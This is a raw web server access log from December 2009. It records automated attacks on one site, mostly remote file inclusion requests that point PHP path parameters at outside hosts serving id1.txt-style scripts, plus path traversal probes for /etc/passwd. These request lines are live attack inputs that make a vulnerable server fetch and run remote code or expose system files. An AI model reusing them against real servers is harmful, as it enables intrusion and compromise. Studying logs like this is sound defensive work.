61.72.254.214 - - [01/Dec/2009:23:31:52 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.72.254.214 - - [01/Dec/2009:23:31:52 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.72.254.214 - - [01/Dec/2009:23:31:52 -0800] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.72.254.214 - - [01/Dec/2009:23:32:20 -0800] "GET /logs/access_090501.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.72.254.214 - - [01/Dec/2009:23:32:45 -0800] "GET /logs/access_090329.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.72.254.214 - - [01/Dec/2009:23:32:50 -0800] "GET /logs/access_090501.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.72.254.214 - - [01/Dec/2009:23:36:41 -0800] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.137.166.6 - - [01/Dec/2009:23:42:34 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
78.137.166.6 - - [01/Dec/2009:23:42:34 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
72.11.145.8 - - [01/Dec/2009:23:42:57 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:42:57 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:42:57 -0800] "GET /logs/access_090501.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:42:57 -0800] "GET /logs/access_090330.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:43:13 -0800] "GET /logs/access_090501.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:43:13 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:43:13 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:43:13 -0800] "GET /logs/access_090330.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:43:18 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:43:18 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:43:18 -0800] "GET /logs/access_090501.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:43:18 -0800] "GET /logs/access_090330.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:47:52 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:47:52 -0800] "GET /logs/access_090501.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:47:52 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:47:53 -0800] "GET /logs/access_090330.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:47:58 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:47:58 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:47:58 -0800] "GET /logs/access_090501.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.11.145.8 - - [01/Dec/2009:23:48:04 -0800] "GET /logs/access_090330.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dua.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.136.32.137 - - [01/Dec/2009:23:49:34 -0800] "GET /PHPDJ_v05/dj/djpage.php?page=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
213.136.32.137 - - [01/Dec/2009:23:49:34 -0800] "GET /PHPDJ_v05/dj/djpage.php?page=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
121.254.229.206 - - [01/Dec/2009:23:50:44 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.254.229.206 - - [01/Dec/2009:23:50:44 -0800] "GET /logs/access_090501.log//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.254.229.206 - - [01/Dec/2009:23:50:44 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.254.229.206 - - [01/Dec/2009:23:51:25 -0800] "GET /logs/access_090731.log//include/admin.lib.inc.php?site_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
204.13.165.203 - - [02/Dec/2009:00:03:15 -0800] "GET /logs/access_090501.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dnai.com.ar/fx1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
204.13.165.203 - - [02/Dec/2009:00:03:15 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dnai.com.ar/fx1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
204.13.165.203 - - [02/Dec/2009:00:03:16 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dnai.com.ar/fx1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
204.13.165.203 - - [02/Dec/2009:00:04:25 -0800] "GET /logs/access_090329.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dnai.com.ar/fx1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
83.209.46.197 - - [02/Dec/2009:00:05:10 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
83.209.46.197 - - [02/Dec/2009:00:05:11 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
204.13.165.203 - - [02/Dec/2009:00:06:12 -0800] "GET /logs/access_090501.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dnai.com.ar/fx1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
204.13.165.203 - - [02/Dec/2009:00:07:30 -0800] "GET /logs/access_090329.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dnai.com.ar/fx1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.195.112.187 - - [02/Dec/2009:00:07:45 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
204.13.165.203 - - [02/Dec/2009:00:08:08 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dnai.com.ar/fx1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
204.13.165.203 - - [02/Dec/2009:00:08:08 -0800] "GET /logs/access_090329.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dnai.com.ar/fx1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
204.13.165.203 - - [02/Dec/2009:00:08:08 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dnai.com.ar/fx1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
204.13.165.203 - - [02/Dec/2009:00:08:11 -0800] "GET /logs/access_090330.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dnai.com.ar/fx1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.229.132.2 - - [02/Dec/2009:00:15:46 -0800] "GET /skin/zero_vote/setup.php?dir=http://j0e1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.229.132.2 - - [02/Dec/2009:00:15:46 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://j0e1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.229.132.2 - - [02/Dec/2009:00:15:46 -0800] "GET /logs/access_090801.log//skin/zero_vote/setup.php?dir=http://j0e1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [02/Dec/2009:00:17:58 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [02/Dec/2009:00:17:58 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [02/Dec/2009:00:17:58 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 3519 "-" "Mozilla/5.0" "wirama.com"
93.184.79.59 - - [02/Dec/2009:00:18:00 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
93.184.79.59 - - [02/Dec/2009:00:18:00 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
210.127.209.27 - - [02/Dec/2009:00:19:13 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [02/Dec/2009:00:19:13 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [02/Dec/2009:00:19:13 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 3519 "-" "Mozilla/5.0" "wirama.com"
202.229.132.2 - - [02/Dec/2009:00:19:39 -0800] "GET /logs/access_090331.log//skin/zero_vote/setup.php?dir=http://j0e1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.229.132.2 - - [02/Dec/2009:00:21:44 -0800] "GET /skin/zero_vote/setup.php?dir=http://j0e1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.229.132.2 - - [02/Dec/2009:00:21:44 -0800] "GET /logs/access_090330.log//skin/zero_vote/setup.php?dir=http://j0e1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.229.132.2 - - [02/Dec/2009:00:21:44 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://j0e1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
66.96.221.5 - - [02/Dec/2009:00:22:31 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
66.96.221.5 - - [02/Dec/2009:00:22:31 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
195.186.64.217 - - [02/Dec/2009:00:23:55 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
195.186.64.217 - - [02/Dec/2009:00:23:55 -0800] "GET /logs/access_090331.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
195.186.64.217 - - [02/Dec/2009:00:23:56 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
195.186.64.217 - - [02/Dec/2009:00:24:28 -0800] "GET /logs/access_090330.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
195.186.64.217 - - [02/Dec/2009:00:25:42 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
195.186.64.217 - - [02/Dec/2009:00:25:43 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
195.186.64.217 - - [02/Dec/2009:00:25:43 -0800] "GET /logs/access_090331.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
195.186.64.217 - - [02/Dec/2009:00:26:21 -0800] "GET /logs/access_090330.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:00:27:15 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:00:27:15 -0800] "GET /logs/access_090701.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:00:27:15 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.6.47.6 - - [02/Dec/2009:00:30:28 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
61.6.47.6 - - [02/Dec/2009:00:30:30 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
61.6.47.6 - - [02/Dec/2009:00:30:31 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
61.6.47.6 - - [02/Dec/2009:00:30:32 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
61.6.47.6 - - [02/Dec/2009:00:30:46 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
61.6.47.6 - - [02/Dec/2009:00:30:47 -0800] "GET /_private/form_results.csv HTTP/1.1" 200 0 "http://www.wirama.com/_private/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
61.6.47.6 - - [02/Dec/2009:00:30:52 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
61.6.47.6 - - [02/Dec/2009:00:30:54 -0800] "GET /logs/ HTTP/1.1" 200 3512 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
195.186.64.217 - - [02/Dec/2009:00:31:02 -0800] "GET /logs/access_090330.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
195.186.64.217 - - [02/Dec/2009:00:31:02 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
195.186.64.217 - - [02/Dec/2009:00:31:02 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
195.186.64.217 - - [02/Dec/2009:00:32:21 -0800] "GET /logs/access_090801.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
195.186.64.217 - - [02/Dec/2009:00:32:39 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
195.186.64.217 - - [02/Dec/2009:00:32:39 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
195.186.64.217 - - [02/Dec/2009:00:32:40 -0800] "GET /logs/access_090330.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
195.186.64.217 - - [02/Dec/2009:00:33:59 -0800] "GET /logs/access_090801.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
66.249.65.244 - - [02/Dec/2009:00:39:56 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.wirama.com"
61.66.28.36 - - [02/Dec/2009:00:40:01 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:00:40:01 -0800] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:00:40:02 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:00:40:32 -0800] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:00:41:30 -0800] "GET /logs/access_090330.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.66.28.36 - - [02/Dec/2009:00:41:30 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.66.28.36 - - [02/Dec/2009:00:41:30 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.137.166.6 - - [02/Dec/2009:00:42:20 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
78.137.166.6 - - [02/Dec/2009:00:42:20 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
61.66.28.36 - - [02/Dec/2009:00:45:54 -0800] "GET /logs/access_090801.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.6.163.20 - - [02/Dec/2009:00:46:19 -0800] "GET /logs/access.log HTTP/1.1" 200 420897 "-" "Mozilla/8.0" "www.wirama.com"
213.136.32.137 - - [02/Dec/2009:00:59:18 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
213.136.32.137 - - [02/Dec/2009:00:59:18 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
118.45.167.247 - - [02/Dec/2009:01:03:10 -0800] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:01:03:10 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:01:03:10 -0800] "GET /logs/access_090731.log/index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.131.226.52 - - [02/Dec/2009:01:06:36 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [02/Dec/2009:01:06:36 -0800] "GET /skin/zero_vote/error.php?dir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [02/Dec/2009:01:06:36 -0800] "GET /logs/access_090501.log//skin/zero_vote/error.php?dir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
83.209.46.197 - - [02/Dec/2009:01:18:53 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
83.209.46.197 - - [02/Dec/2009:01:18:54 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
202.131.226.52 - - [02/Dec/2009:01:21:04 -0800] "GET /skin/zero_vote/error.php?dir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [02/Dec/2009:01:21:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [02/Dec/2009:01:21:04 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
93.184.79.59 - - [02/Dec/2009:01:22:25 -0800] "GET /index.php?redir=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
